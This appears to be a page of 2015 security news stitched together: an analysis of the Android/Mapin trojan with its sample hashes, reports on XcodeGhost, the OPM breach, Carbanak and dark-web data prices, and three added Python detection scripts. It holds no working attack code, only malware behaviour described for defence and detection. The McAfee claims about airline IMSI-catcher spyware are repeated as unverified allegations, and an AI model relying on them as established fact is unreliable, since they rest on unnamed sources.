The trojan notifies the remote server whether device administrator activation was successful or not. The user then gets a fullscreen (interstitial) ad popped up. This interstitial ad is displayed at every connectivity change. The ads are delivered by abusing the legitimate AdMob SDK.

Figure 7: Interstitial ads
Communication via Google Cloud Messaging
The trojan communicates with the server using Google Cloud Messaging (GCM). This form of communication is becoming more and more common in malware these days. The backdoor can respond to commands received from the server.

Figure 8: Commands
Not all of its functionality has been fully implemented, and some functionality that is implemented is not used. There is a possibility that this threat is still under development and that the trojan will be improved in the future. Its main purpose, controlled from the remote server, is to deliver aggressive advertising to end users while pretending to be a system application.
It can also deliver other malware to the user's device. It can enable or disable interstitial or banner ads, change the publisher ID for the displayed ads, choose whether to display ads to the user, change the delay between ads being shown, install, download and launch applications, push notifications, revoke device admin rights, change the server the malware communicates with, and create home-screen shortcuts to URLs that install downloaded applications. After executing each task received via GCM, the client device informs the remote server over HTTPS that the task was completed successfully.
The trojan was successfully uploaded to the Google Play Store, probably because Bouncer did not implement all the relevant malware triggers, in this case emulating a change in network connectivity. Another interesting question is why Bouncer did not statically analyze the executable file inside the assets of the uploaded game. For this reason, the trojan remained undetected and was freely available to users. The infected game "Super Hero Adventure" was uploaded to the Play Store by the developer "SHSH". It is possible that more applications from this developer were submitted to the official Google store. The trojans were eventually pulled from the Google Play Store, but had gone undetected for almost a year and a half. Perhaps because of this and similar cases, Google announced that from March 2015 all applications and updates must pass human review.
Best practice for avoiding malware downloads from the official store is to download applications from trusted developers and to read comments from people who are already using them. Also consider whether the permissions the application requests when it asks to be installed are justified. If something suspicious is going on, consider submitting a sample to your antivirus vendor for analysis, together with your reasons for submitting it.
More information & hashes
Application name | Package name | MD5 | Detection
Highway Zombie | com.heighwayzombie | 2f6323af124f9fd57edb1482827f9481 | Android/TrojanDropper.Mapin
Plant vs Zombie | com.plantzombie | 8721901a2caaeb98a19e0fb909ce2569 | Android/TrojanDropper.Mapin
Subway Suffer | com.subwaysuffers | ba3c1894310d38aa814ad3c58f1c8469 | Android/TrojanDropper.Mapin
Climb Racing | com.hillclimbrace | 87cc79d6f6795fea0df109e181d1a3e8 | Android/TrojanDropper.Mapin
Temple Run 2 Zoombie | com.templerunzombies | d5afd7ba5b3bd24cd4fa5201882e1a9d | Android/TrojanDropper.Mapin
Traffic Racer | com.traficracer | 9cbfd66f35a36d9f75a89f342da9c784 | Android/TrojanDropper.Mapin
Google Play Update | com.system.main | f8df9e2d21018badc7555a9233a8b53e | Android/Mapin
Arrange Block - Brick Game | (none listed) | d7facf652d3947a53f85431ba8a4cd4a | Android/TrojanDropper.Mapin
Manage Settings | com.appgp.main | 5586e93ac84317348904adfe01c9715c | Android/Mapin
Candy Crush | com.tgame.candycrush | 745e9a47febb444c42fb0561c3cea794 | Android/TrojanDropper.Mapin
Manage Settings | com.appgp.main | c19896fdd3b96b9324c6b79cc39eca5b | Android/Mapin
Super Maria Adventure | (none listed) | 0d7c889e8a9be51a58041d55095f104f | Android/TrojanDropper.Mapin
Manage Settings | com.appgp.main | c19896fdd3b96b9324c6b79cc39eca5b | Android/Mapin
Super Maria Journey | com.tgame.maria | ee8e4e3801c0101998b7dfee33f35f95 | Android/TrojanDropper.Mapin
Google Play Update | com.appgp.main | 195432955e70ec72018ead058f7abc2d | Android/Mapin
Zombie Highway Killer | com.absgame.zombiehighwaykiller | 1516174c4a7f781c5f3ea6ac8447867b | Android/TrojanDropper.Mapin
Manage Settings | com.appgp.main | f05ac3ac794ee8456db4d0331830d2d8 | Android/Mapin
Plants VS Zombies | com.tgame.plantvszombie | 10edaf2b4c25375644faf78a25790061 | Android/TrojanDropper.Mapin
Google Play Update | com.appgp.main | f8879f759b00ed9d406dd14ce450584b | Android/Mapin
Plants VS Zombies | com.popcap.pvz_row | 9b72df484915ce589ade74e65ecdfaed | Android/TrojanDropper.Mapin
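The Mapin description above (and the shorter English summary of Android/Mapin in the "7 years of Android" piece earlier on this page) lists several static tells: a broadcast receiver registered in the manifest for connectivity changes, a receiver that requests device administrator rights, a second package bundled in the assets under the name systemdata or resourcea, and the MD5s of the dropped payload. The following triage script is an added example, not ESET's code or tooling: it scores a decoded AndroidManifest.xml and an asset listing against those tells. The action and permission strings are the standard Android ones; the sample manifest and asset bytes are constructed for the demonstration, and the hash set comes from the Android/Mapin rows of the table above.

```python
"""Static triage for the Android/Mapin dropper pattern (added example, not ESET's).

Inputs are a decoded AndroidManifest.xml (as produced by an APK decoder) and
a mapping of asset paths to bytes. Indicators checked:
  * a manifest-registered receiver for android.net.conn.CONNECTIVITY_CHANGE,
  * a receiver guarded by android.permission.BIND_DEVICE_ADMIN,
  * a bundled asset named systemdata or resourcea,
  * an asset whose MD5 matches a hash published for the dropped payload.
"""
import hashlib
import posixpath
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
CONNECTIVITY_ACTION = "android.net.conn.CONNECTIVITY_CHANGE"
DEVICE_ADMIN_PERMISSION = "android.permission.BIND_DEVICE_ADMIN"
DROPPED_ASSET_NAMES = {"systemdata", "resourcea"}

# MD5s of the dropped Android/Mapin payload, as listed in the article's table.
KNOWN_MAPIN_MD5 = {
    "f8df9e2d21018badc7555a9233a8b53e",
    "5586e93ac84317348904adfe01c9715c",
    "c19896fdd3b96b9324c6b79cc39eca5b",
    "195432955e70ec72018ead058f7abc2d",
    "f05ac3ac794ee8456db4d0331830d2d8",
    "f8879f759b00ed9d406dd14ce450584b",
}


def is_known_mapin_md5(md5_hex: str) -> bool:
    """True when the hash is one of the published Android/Mapin payload hashes."""
    return md5_hex.lower() in KNOWN_MAPIN_MD5


def manifest_indicators(manifest_xml: str) -> list:
    """Return the manifest-level indicators found in a decoded AndroidManifest.xml."""
    root = ET.fromstring(manifest_xml)
    found = []
    application = root.find("application")
    if application is None:
        return found
    for receiver in application.findall("receiver"):
        actions = {a.get(ANDROID + "name") for a in receiver.iter("action")}
        if CONNECTIVITY_ACTION in actions:
            found.append("manifest-registered connectivity-change receiver")
        if receiver.get(ANDROID + "permission") == DEVICE_ADMIN_PERMISSION:
            found.append("device-admin receiver")
    return found


def asset_indicators(assets: dict) -> list:
    """Flag bundled assets by name and by hash. `assets` maps zip path -> bytes."""
    found = []
    for path, data in assets.items():
        if posixpath.basename(path) in DROPPED_ASSET_NAMES:
            found.append(f"bundled payload asset: {path}")
        if is_known_mapin_md5(hashlib.md5(data).hexdigest()):
            found.append(f"known Android/Mapin hash: {path}")
    return found


def triage(manifest_xml: str, assets: dict) -> dict:
    """Combine both indicator sets; two or more tells is treated as suspicious."""
    indicators = manifest_indicators(manifest_xml) + asset_indicators(assets)
    return {"indicators": indicators, "suspicious": len(indicators) >= 2}


# Constructed sample manifest: a "game" carrying the dropper's two receivers.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakegame">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Fake Game">
    <activity android:name=".GameActivity"/>
    <receiver android:name=".ConnReceiver">
      <intent-filter>
        <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".AdminReceiver"
              android:permission="android.permission.BIND_DEVICE_ADMIN">
      <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed asset listing: the bundled second package is the tell.
SAMPLE_ASSETS = {
    "assets/textures/background.png": b"\x89PNG constructed sample",
    "assets/systemdata": b"PK\x03\x04 constructed second package",
}

if __name__ == "__main__":
    result = triage(SAMPLE_MANIFEST, SAMPLE_ASSETS)
    for line in result["indicators"]:
        print("-", line)
    print("suspicious:", result["suspicious"])
```

A connectivity-change receiver on its own is common in benign apps, which is why the verdict requires at least two independent tells; the device-admin receiver combined with a second package in the assets is the combination the article describes, and a hash match is conclusive on its own.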


How does this privacy apply to cybersecurity? The role of cyberlaw in protecting cyber vendor services against the risk of litigation exposure.
In most countries and most legal systems, the sanctity of the attorney client relationship is guarded by the courts. Without confidentiality and privacy, the system of law can break down from the lack of trust. Thus, the institution of law protects the privacy of the client relationship in order to promote the integrity and legitimacy of the legal system, which in turn, bolsters the good order and efficiency of other societal institutions.

How does this privacy apply to cybersecurity? Cybersecurity services between vendor and customer, especially the transfer of data, can be protected much like the delivery of other legal services under the legal system's unique privileges. There is also the added dimension of cyberlaw risk advisory, which correlates technical details with meaningful exposure and compliance analysis.

The US market is especially sensitive to litigation exposure. This risk would apply to any organization with data exposure in the US. As we have seen with recent cases in US courts, this exposure risk extends through a company’s supply chain irrespective of a company’s direct data exposure in the US market.

In light of the cyberlaw advantage, why would a customer of cybersecurity services, especially after suffering a cyberattack, leave open to litigation or regulatory risks all its errors and omissions when there are structural protections available from cyberlaw counsel?


More and more, Security Affairs is seeing interdisciplinary approaches to cyber defense, including economics, insurance, risk management, and emergency preparedness. Adding the problem-solving dimensions of cyberlaw is a welcome addition.

A cyberlaw leader, Doug DePeppe of eosedge Legal, offered an analogy:

“Under the InfoSec ‘CIA Triad’, the objectives of confidentiality and integrity are protected by privacy-wrapping tools like encryption and network security technologies. With these technologies, we seek to maintain the privacy of data. Think of cyberlaw as another privacy wrapper enabled by an institution rather than a technology.”
The cyberlaw model is best introduced up-front during incident response planning and risk assessments. Trusted advisory, a staple of the institution of law, is another benefit. Additionally, the cyberlaw model is not limited simply to the delivery side of vendor services. The entire cyber domain ecosystem can benefit, including in the production of cyber intelligence.

“Cyberlaw differentiation from the standard practice of law has generated interest from White Hats. For one, they often need legal guidance; but additionally, confidentiality enables trust building, legal landscape navigation, and prudent, law-abiding cyber operations. With so much uncertainty surrounding cyber intelligence, we have found that the institution of law is a trust-enabling institution that aids information sharing,” said Doug DePeppe.

Security Affairs continues to monitor and bring news about emerging interdisciplinary approaches to cybersecurity. A structural and privacy-enhancing dimension from cyberlaw seems to add an important Best Practice perspective to reduce cyber risk exposure.

Data breaches, stolen data and their sale in the Dark Web

Trend Micro published a report that explains the dynamics triggered by data breaches, following data from the incidents to their offer in the Dark Web.

Stolen data is a precious commodity in the criminal ecosystem, and in particular in the Deep Web. The great number of data breaches that security firms frequently discover is fueling the underground market with an impressive amount of users’ data.

Let’s think of the recent attacks suffered by Ashley Madison, OPM and Hacking Team, which impacted millions of users; their accounts and intellectual property were compromised by increasingly sophisticated hacks.

As usual, the experts at Trend Micro are a source of inspiration for me; like me, they constantly monitor the evolution of the criminal underground, giving us an interesting point of view on the activities of the principal crime rings.

The latest report, entitled “Follow the Data: Dissecting Data Breaches and Debunking the Myths”, focuses on data breaches and the dynamics triggered by such events.

The experts integrated their analysis with data from the Privacy Rights Clearinghouse (PRC)’s Data Breaches database and discovered that hacking or malware accounted for 25 percent of data breaches in Q1 2015. Other causes are insiders, physical skimming devices and the loss or theft of devices (i.e. mobile devices, flash drives).

method of data breaches

Data breaches are really complex phenomena to analyze; it is not easy to promptly discover the root causes, nor to predict the medium- and long-term effects on the victims.

Some data breaches are caused intentionally by threat actors; others are the result of an unintended disclosure, typically personnel mistakes or negligence.

The statistics on data breaches confirm that the number of incidents that exposed credit and debit card data has increased 169% in the past five years. It is interesting to note that the value of information in the underground market is changing rapidly: while the prices for credit and debit card, bank account, and personally identifiable information (PII) are dropping due to oversupply, the value of compromised Uber, online gaming and PayPal accounts is rising. PII is the data most likely to be stolen, followed by financial data.

Analyzing the data breaches per industry, it is possible to note that healthcare is the most affected by data breaches, followed by government and retail.

The report follows the entire life cycle of a data breach, from the intrusion to the offer of the stolen data on the Dark Web.

The researchers investigated the prices of commodities in the black markets hosted on the Tor network: US mobile operator accounts can be purchased for as little as $14 each, but the underground offers much more, including Amazon, eBay, Facebook, PayPal, Netflix, and Uber accounts.

data breached stolen data offer

The offer is very varied and multiple factors contribute to the final price of the commodity; for example, PayPal and eBay accounts with a few months or years of transaction history go for up to $300 each.

Bank accounts are offered for prices ranging from $200 to $500 per account, depending on the balance and the account history.

As anticipated, the disconcerting finding of the research relates to the value of personally identifiable information (full address, date of birth, Social Security number, and other PII): each record is sold for $1.

As already noted in other reports, document scans of passports, driver’s licenses and utility bills are becoming even more popular; many sellers in the black markets also include this kind of information in their offer, which could dramatically improve the efficiency of fraud schemes.

Document scans are available for purchase from $10 to $35 per document.

XcodeGhost Attack – Is Apple’s Biggest Hack Ever linked to the US Intelligence?

Rumors on the Internet are linking the attack based on XcodeGhost to operations conducted by the CIA (Central Intelligence Agency).
A few days ago, leading security firms reported the first major cyber attack on the official Apple App Store: thousands of legitimate applications were infected by the XcodeGhost malware. Apple announced it is cleaning up the official iOS App Store to remove malicious iPhone and iPad applications; the company confirmed that this is the first large-scale attack on the official store that evaded its stringent app review process.

“We’ve removed the apps from the App Store that we know have been created with this counterfeit software,” Apple spokeswoman Christine Monaghan said in an email. “We are working with the developers to make sure they’re using the proper version of Xcode to rebuild their apps.”
The cyber attack was reported by several cyber security firms that detected a malicious program dubbed XcodeGhost that was used to “trojanize” hundreds of legitimate apps. The researchers confirmed that the attackers have infected several apps, including the popular mobile chat app WeChat and the music app from Internet portal NetEase.

Despite the prompt response of the Apple security team, the number of infected apps keeps growing: the security firm FireEye detected more than 4,000 infected apps in the App Store.

“Immediately after learning of XcodeGhost, FireEye Labs identified more than 4,000 infected apps on the App Store. FireEye has since updated detection rules in its NX and Mobile Threat Prevention (MTP) products to detect the malicious apps and their activity on a network. FireEye NX customers are alerted if an employee uses an infected app while the iOS device is connected to the corporate network.” states FireEye.
Attackers embedded the malicious code in the apps by deceiving developers and tricking them into using a bogus version of Apple’s Xcode.
“The hackers embedded the malicious code in these apps by convincing developers of legitimate software to use a tainted, counterfeit version of Apple’s software for creating iOS and Mac apps, which is known as Xcode, Apple said.” Reuters reported.


Now rumors on the Internet are linking the attack based on XcodeGhost to operations conducted by the CIA (Central Intelligence Agency).
XcodeGhost is used by hackers to take over the victim’s mobile device; it is able to steal credentials, hijack the user’s traffic, and steal iCloud passwords from the device.

The attack method implemented by XcodeGhost is similar to the one developed by experts at the Central Intelligence Agency (CIA), which was reported by The Intercept in March 2015.

The report, published by The Intercept and based on documents leaked by Edward Snowden, described the efforts of US intelligence to exploit Xcode as an infection vector. US intelligence was able to use it to establish a backdoor into iOS apps while avoiding any control.

Every app built with the bogus version of Xcode was able to spy on users.

“The security researchers also claimed they had created a modified version of Apple’s proprietary software development tool, Xcode, which could sneak surveillance backdoors into any apps or programs created using the tool. Xcode, which is distributed by Apple to hundreds of thousands of developers, is used to create apps that are sold through Apple’s App Store. The modified version of Xcode, the researchers claimed, could enable spies to steal passwords and grab messages on infected devices. Researchers also claimed the modified Xcode could “force all iOS applications to send embedded data to a listening post.” It remains unclear how intelligence agencies would get developers to use the poisoned version of Xcode.” states an excerpt from the report published by The Intercept.

The description matches the XcodeGhost attack. Of course, these are just assumptions, but many security experts consider the entire story plausible.

5.6 Million Federal Employees' Fingerprints Stolen in OPM Hack

The OPM (Office of Personnel Management) data breach is getting even worse than we thought.
We already knew that more than 21 million current and former federal employees had their personal and highly sensitive private information stolen in a massive data breach that hit the OPM.
But now it has been revealed that the hackers made off with a lot more than just the names, residential addresses and Social Security numbers of US government employees: they also took a unique identifier that never changes, the fingerprints.
5.6 Million Fingerprints Breached
US officials admitted on Wednesday that nearly 5.6 million fingerprints of federal employees were also stolen in the massive data breach that took place in April this year.
The OPM, the US government agency that handles federal employee records, had previously reported that some 1.1 million fingerprints were stolen. That figure has now been revised to 5.6 million.
Think about it: stolen fingerprints are an even worse scenario than stolen passwords, because unlike passwords you cannot change your fingerprints.
Fingerprints are now frequently used for biometric authentication, from smartphones to government checkpoints and background checks. So once they are stolen, the miscreants can keep misusing your fingerprint data for the rest of your life.
However, federal experts believe that the “ability to misuse fingerprint data is limited… This probability could change over time as technology evolves,” OPM press secretary Samuel Schumach said in a statement on Wednesday.
What's even worse?
The final number (5.6 million) isn't confirmed yet, as Schumach noted that an interagency investigation group will “continue to analyze and refine the data as it prepares to mail notification letters to impacted individuals.”
Yes, the OPM has set up an interagency team – which includes members of the FBI, the Defense Department and Homeland Security, among others – to review the potential ways hackers could “misuse fingerprint data now and in the future.”
The government also promises to provide additional information to affected individuals if hackers find new ways to misuse their fingerprint data in the future.
For now, whoever has access to the goldmine of stolen OPM data holds a highly powerful, unchangeable key.

China spies on airline passengers with IMSI-catchers

The well-known expert John McAfee claims that passengers of four Chinese airlines are being spied on by the Beijing government using IMSI-catcher technology.
John McAfee, founder of the McAfee security firm, has always been known for controversial comments in the IT industry, but also for good sources that get him valuable information first hand. In his most recent article he writes about the Chinese government's ability to spy on the customers of four highly renowned airlines.

McAfee has not revealed the names of the airlines or explained how he obtained the information, but he did provide details on the tactic behind the cyber-espionage campaign.


First, he provided to “hundreds of international travelers flying with four highly renowned airlines” an Android app able to detect “man in the middle attacks by devices that emulate legitimate cell phone towers”.

The app looks for anomalies that are characteristic of IMSI-catchers (IMSI stands for International Mobile Subscriber Identity), telltale behaviour that the makers of such devices cannot hide.

So what exactly is an IMSI-catcher?

“IMSI-catchers are devices that emulate cell phone towers. They trick our smartphones into believing a cell tower suddenly appeared in close range and entices our phones to connect through it.”

If your phone is caught by an IMSI-catcher, you are in trouble. Once you are connected to the fake cell tower, a man-in-the-middle attack is carried out: “the IMSI-catcher analyses our configuration and ‘pushes’ the necessary software into our smartphones in order for some third party related to the IMSI catcher to take control.”
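The detection the article alludes to can be illustrated with a small heuristic of the kind such an app would implement. The following Python is an added example, not McAfee's app or any code from his article; the observation format, the baseline of known cells and the thresholds are this example's own assumptions, and the sample data is constructed. It flags a serving cell that is unknown, unusually strong, advertises no neighbours and disables ciphering, all behaviour a fake base station has trouble hiding:

```python
"""Heuristic IMSI-catcher detection over a constructed log of cell observations.

Each observation is what a phone's baseband reports about its serving cell:
location area code (lac), cell id (cid), signal strength (rssi, dBm), the
ciphering algorithm in use (A5/0 means none) and the neighbour cells the
tower advertises. A baseline from earlier, uneventful sessions is compared
with the session under test and the anomalies a fake base station cannot
avoid producing are reported. Field layout and thresholds are assumptions.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class CellObs:
    lac: int
    cid: int
    rssi: int               # dBm; closer to 0 is stronger
    cipher: str             # "A5/0" (none), "A5/1", "A5/3", ...
    neighbours: tuple = ()  # cell ids in the tower's advertised neighbour list


def detect_anomalies(baseline, session, rssi_margin=25):
    """Return [(index, reason), ...] for suspicious observations in session.

    baseline: CellObs sequence from trusted sessions (defines the known cells
              and the strongest signal level normally seen)
    session:  CellObs sequence under test
    """
    known = {(o.lac, o.cid) for o in baseline}
    strongest_known = max((o.rssi for o in baseline), default=-90)

    findings = []
    prev = None
    for i, o in enumerate(session):
        reasons = []
        cell = (o.lac, o.cid)
        if o.cipher == "A5/0":
            reasons.append("ciphering disabled (A5/0)")
        if cell not in known and o.rssi > strongest_known + rssi_margin:
            reasons.append("unknown cell with unusually strong signal")
        if not o.neighbours:
            reasons.append("empty neighbour list")
        if (prev is not None and o.lac != prev.lac and cell not in known
                and o.cid not in prev.neighbours):
            reasons.append("location area changed to an unknown, unannounced cell")
        if reasons:
            findings.append((i, "; ".join(reasons)))
        prev = o
    return findings


# Constructed sample data (not real network captures). Baseline: three
# genuine cells of one location area, seen on previous trips.
BASELINE = [
    CellObs(lac=100, cid=1001, rssi=-85, cipher="A5/1", neighbours=(1002, 1003)),
    CellObs(lac=100, cid=1002, rssi=-90, cipher="A5/1", neighbours=(1001, 1003)),
    CellObs(lac=100, cid=1003, rssi=-95, cipher="A5/1", neighbours=(1001, 1002)),
]

# Session under test: a normal cell, then a "tower" that appears out of
# nowhere with a very strong signal, no neighbours and no ciphering, then
# the phone falls back to a genuine cell.
SESSION = [
    CellObs(lac=100, cid=1001, rssi=-84, cipher="A5/1", neighbours=(1002, 1003)),
    CellObs(lac=999, cid=7777, rssi=-45, cipher="A5/0", neighbours=()),
    CellObs(lac=100, cid=1002, rssi=-88, cipher="A5/1", neighbours=(1001, 1003)),
]

if __name__ == "__main__":
    for idx, why in detect_anomalies(BASELINE, SESSION):
        print(f"observation {idx}: {why}")
```

A real implementation would read these values from the baseband (where the operating system exposes them at all) and tune the thresholds per network; any single indicator is noisy, but several at once on the same cell is the signal worth alerting on.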

If you want more details on this technology, have a look at the post “StingRay Technology: How Government Tracks Cellular Devices”, where I described IMSI-catchers and similar devices in detail.

The use of IMSI-catchers is well known and documented, but it is alarming that they are being used by airlines controlled by the Chinese government.

The method the airlines use to control passengers is as simple as it is effective, as reported by the International Business Times: the airlines use an IMSI-catcher to compromise a traveler’s device when it attempts to connect to the onboard internet.

“In every case where an international traveler with these four airlines attempted to connect to the onboard internet, a module was pushed to the connecting smartphone that surreptitiously turned on the 3G or 4G communications (without displaying the corresponding icon). From that point, an onboard IMSI-catcher attempted to connect to the phone. There was a 100% success rate.”

After this step, the attacker checks whether the phone already has an Android app called “Silent Logging” installed; if not, the app is pushed to the device.

“Silent Logging” has the sole purpose of spying on you; the list of permissions it requests was shown as screenshots in the original article.

“After Silent Logging is activated, a spyware app is downloaded to the users’ smartphone that utilises the Silent Logging app, unless the phone is “physically wiped” by the manufacturer, this software remains forever.”

If you try to do a factory reset on your own, be aware that the spyware will detect it and merely simulate a factory reset.

Once the spyware is installed, your device is at the government's disposal: reading emails and SMS, recording video and audio, and so on, with everything sent to China.

The alleged espionage activity carried out by the Chinese government through IMSI-catcher technology is alarming and should be taken seriously.

Chinese cybercriminals stole millions of fingerprints, the US claims
24.9.2015 Incidents

Unknown hackers managed to obtain the fingerprints of 5.6 million people who had applied for or already held a US government security clearance. The figure was originally put at 1.1 million fingerprints; it has now been revised to show that up to five times as much data was stolen in the spring.

The attack targeted the personal data of 21.5 million current and former employees of US federal agencies, as well as people who had applied for jobs at those institutions.

US investigators believe China is behind the attack. That is one reason the disclosure drew so much attention given its timing: Chinese president Xi Jinping is currently visiting the United States. Among other things he met with representatives of large technology companies. Xi Jinping has consistently denied that China is behind attacks aimed at American companies.

According to experts, the theft will significantly help Chinese intelligence and may also lead to the exposure of some American spies. Besides fingerprints, the hackers also obtained Social Security numbers and other sensitive data.

Although OPM says the scope for misusing fingerprints is limited, the hack is a disaster, writes the AP news agency. As early as June, government sources suspected Chinese cybercriminals of stealing the personal data of four million people from US government servers.

The theft of fingerprints could increase the exposure of some systems. “You can change a password easily, but you can't change a fingerprint,” Wired commented. The government adds that “according to experts, the risk of misuse of fingerprint data is minimal,” but that could change in the future with the arrival of new security technologies.

Eset buys an encryption company, and has also uncovered dangerous malware

24.9.2015 Viruses
Eset is buying the British company DESlock+, a maker of encryption tools. It already offers the firm's products through its Technology Alliance.

DESlock+ developed an encryption solution built on its encryption-key management technology.

The DESlock+ product has a wide range of encryption features, including browser-based management of the whole deployment, a mobile version for iOS, Apple's mobile operating system, and the portable DESlock+ GO client, which allows secure access to data on workstations even without the DESlock+ product installed.

“Our plan is to fully integrate encryption into our products for businesses and home users. And of course we will continue to develop the DESlock+ encryption technology,” says Palo Luka, Eset's chief technology officer.

DESlock+ is to be gradually absorbed into Eset's structure, so it will no longer operate independently.

Eset has also detected new traces of activity by the feared Carbanak group, which became notorious in 2013 and 2014 for targeted attacks on the systems of roughly a hundred banks.

Using malware, the criminals were able to control banking systems to such a degree that they could issue money-transfer orders or change ATM settings at will, for example so that the machine would dispense large sums to anyone who entered a designated code.

The malware arsenal has changed, but parts of the code and the digital certificate used clearly point to a link with the original Carbanak malicious code, which Eset detects as Win32/Spy.Sekur.

Notably, the Carbanak group's new attacks are not aimed only at banks but also at other institutions in the financial sector, for example firms dealing in currency trading. Among the identified targets was also a hotel and casino in Las Vegas.

Carbanak, which drained a billion dollars from banks, is starting to rampage again

23.9.2015 Viruses

In February this year the “great cyber heist” was uncovered, behind which stood the Carbanak group, or rather the malware of the same name. It spread through banks around the world and gave the attackers access to banking systems. In smaller amounts, they then gradually transferred an estimated up to one billion dollars to their own accounts. The Carbanak group is now evidently active again, and it no longer focuses only on banks.

Map: everywhere Carbanak was “draining” money

The original major discovery was the work of Kaspersky's team; now the new discovery comes from competitor ESET. “The malware arsenal has changed, but parts of the code and the digital certificate used clearly point to a link with the original Carbanak malicious code,” explains an Eset representative.

The new forms of malware targeting employees of financial institutions no longer seek a way only into banks but also into other companies where online currency transactions take place. “Among the identified targets was also a hotel and casino in Las Vegas,” ESET notes.

Apple's new system is full of holes. Hackers get in without a password

23.9.2015 Mobile
It took hackers literally only a few days to find a back door into the iOS 9 operating system, which Apple released only last week. In record time, cybercriminals nonetheless managed to find a way to get at other people's data even without knowing the passcode.
The national security team CSIRT warned of the back door in the iOS 9 operating system, which is used by iPhone smartphones, iPad tablets and iPod Touch touchscreen media players.

“Hackers have found a way to gain access to passwords and contacts stored on Apple devices running iOS version 9 even when those devices are protected by a passcode or Touch ID technology,” said security analyst Pavel Bašta of the CSIRT team, which is operated by the CZ.NIC association.

The risk is not that high
The discovered vulnerability, however, does not pose as great a danger to ordinary users as it might seem at first glance. While the vast majority of other flaws can be exploited remotely over the internet, the newly found back door can only be abused by someone who actually has the phone in hand.

Even so, Apple can be expected to fix the bug with an update in the foreseeable future. The American computer giant has not yet said when.

The ninth generation of the iOS mobile platform catches the eye with a more colourful look, which incidentally also seems more modern than the current version 8. Behind the attractive veneer, though, lies a whole range of functional improvements; an overview of the most important ones can be found in our earlier article.

Allegedly 40 apps on the App Store are infected

A worm has been found in Apple’s walled garden. About 40 iOS apps are being removed from the App Store because they turned out to be infected with malicious code designed to build a botnet out of Apple devices.


The XcodeGhost malware affected dozens of apps, including WeChat (600+ million users), NetEase’s music app, the business-card scanner CamCard and Didi Kuaidi’s Uber-like ride-hailing app. To make matters worse, the Chinese version of Angry Birds 2 was infected too. Is nothing sacred anymore?

Apple spends a lot of time and effort vetting each and every app in the App Store. These efforts set the App Store apart from Google Play and third-party stores, which were plagued by malicious software (at least until Google launched its own malware scanning).

Against this background, September 2015 looks like an especially bad month for Apple: experts found malware targeting jailbroken devices, everybody was talking about the “biggest theft ever involving Apple accounts,” and now Palo Alto Networks has found compromised software in the App Store.

What is Xcode, and what exactly is XcodeGhost?
Xcode is a free suite of tools that developers use to build apps for iOS and OS X. It is officially distributed by Apple, and unofficially by various third parties.

XcodeGhost is malicious software designed to infect Xcode itself and thereby compromise apps built with the infected tools. The affected applications steal users’ private data and send it to the attackers.

How were the apps compromised?
Apple’s official Xcode was not compromised; the problem is with an unofficial copy of the tool uploaded to the cloud storage service of Baidu (think China’s Google). It is common practice in China to download the necessary tools from third-party sites, and this time it turned out to be a very bad habit.

There is a reason Chinese developers choose unofficial and insecure sites over safe official sources. Internet in the country is rather slow; moreover, the Chinese government limits access to foreign servers to three gateways. As the Xcode installation package is about 3.59 GB, downloading it from Apple’s servers can take a very long time.

Matthew Panzarino (@panzer) tweeted on September 21, 2015: “Holy cow. Tainted copies of Xcode spreading malware using developers as a vector.”
So all the actor behind XcodeGhost had to do was infect an unofficial package of tools with discreet malware and let legitimate developers do the rest for them. Researchers at Palo Alto Networks determined that the malicious Xcode package had been available for six months and had been downloaded and used to build numerous new and updated iOS apps. Those apps were then naturally pushed to the App Store and somehow bypassed Apple’s anti-malware scanning.
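One check that catches a toolchain tampered with in this way is to compare the installed copy, file by file, against a hash manifest taken from a copy obtained directly from Apple. The following Python is an added example and not part of the original article, Apple's tooling or fastlane; the manifest format (relative path to SHA-256), the miniature Xcode.app-like layout and the file names in it are this example's own assumptions, and the two trees it compares are constructed in temporary directories:

```python
"""Verify an installed toolchain against a known-good SHA-256 manifest.

A tampered copy of a toolchain differs from the genuine one at the byte
level, so hashing every file of a trusted copy once and comparing the
installed tree against that manifest reports added, modified and missing
files. The manifest format (relative path -> sha256 hex) is an assumption of
this example, not something Apple ships.
"""
import hashlib
import os
import tempfile


def sha256_file(path, chunk=1 << 20):
    """SHA-256 of a file, read in chunks so large binaries do not load whole."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def build_manifest(root):
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue  # symlinks: the target file is hashed under its own path
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def verify_tree(root, manifest):
    """Compare the tree at root with manifest; return added/missing/modified lists."""
    actual = build_manifest(root)
    return {
        "added": sorted(set(actual) - set(manifest)),
        "missing": sorted(set(manifest) - set(actual)),
        "modified": sorted(p for p in manifest if p in actual and actual[p] != manifest[p]),
    }


def _write(root, rel, data):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed scenario: a trusted tree and a tampered installed copy of it."""
    with tempfile.TemporaryDirectory() as trusted, tempfile.TemporaryDirectory() as installed:
        # Minimal stand-in for an Xcode.app layout; paths and contents are illustrative.
        files = {
            "Contents/Developer/usr/bin/clang": b"clang binary",
            "Contents/Frameworks/CoreServices.framework/CoreServices": b"CoreServices",
            "Contents/Info.plist": b"<plist/>",
        }
        for rel, data in files.items():
            _write(trusted, rel, data)
            _write(installed, rel, data)
        # Tampering: an extra object file dropped into a framework directory
        # and the framework binary itself altered (hypothetical names).
        _write(installed, "Contents/Frameworks/CoreServices.framework/evil.o", b"malicious")
        _write(installed, "Contents/Frameworks/CoreServices.framework/CoreServices",
               b"CoreServices+payload")
        manifest = build_manifest(trusted)
        return verify_tree(installed, manifest)


if __name__ == "__main__":
    print(demo())
```

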